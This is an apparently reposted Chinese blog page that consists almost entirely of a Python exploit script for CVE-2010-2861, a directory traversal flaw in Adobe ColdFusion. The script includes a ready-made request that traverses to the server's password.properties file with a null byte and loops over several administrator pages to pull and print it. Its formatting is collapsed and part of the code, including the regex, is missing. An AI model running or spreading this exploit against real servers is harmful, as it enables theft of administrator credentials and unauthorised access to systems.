本文共 1963 字，大约阅读时间需要 6 分钟。

# Working GET request courtesy of carnal0wnage:# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en## LLsecurity added another admin page filename: "/CFIDE/administrator/enter.cfm"#!/usr/bin/python# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability# detailed information about the exploitation of this vulnerability:# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/# leo 13.08.2010import sysimport socketimport re# in case some directories are blockedfilenames = ("/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", "/cfide/install.cfm", "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/enter.cfm")post = """POST %s HTTP/1.1Host: %sConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: %dlocale=%%00%s%%00a"""def main():    if len(sys.argv) != 4:        print "usage: %s 
    
     
     
      " % sys.argv[0]        print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]        print "if successful, the file will be printed"        return        host = sys.argv[1]    port = sys.argv[2]    path = sys.argv[3]    for f in filenames:        print "------------------------------"        print "trying", f        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        s.connect((host, int(port)))        s.send(post % (f, host, len(path) + 14, path))        buf = ""        while 1:            buf_s = s.recv(1024)            if len(buf_s) == 0:                break            buf += buf_s               m = re.search('
      ', buf, re.S)        if m != None:            title = m.groups(0)[0]            print "title from server in %s:" % f            print "------------------------------"            print m.groups(0)[0]            print "------------------------------"if __name__ == '__main__':    main()
     
    
   

转载地址：http://bqqmb.baihongyu.com/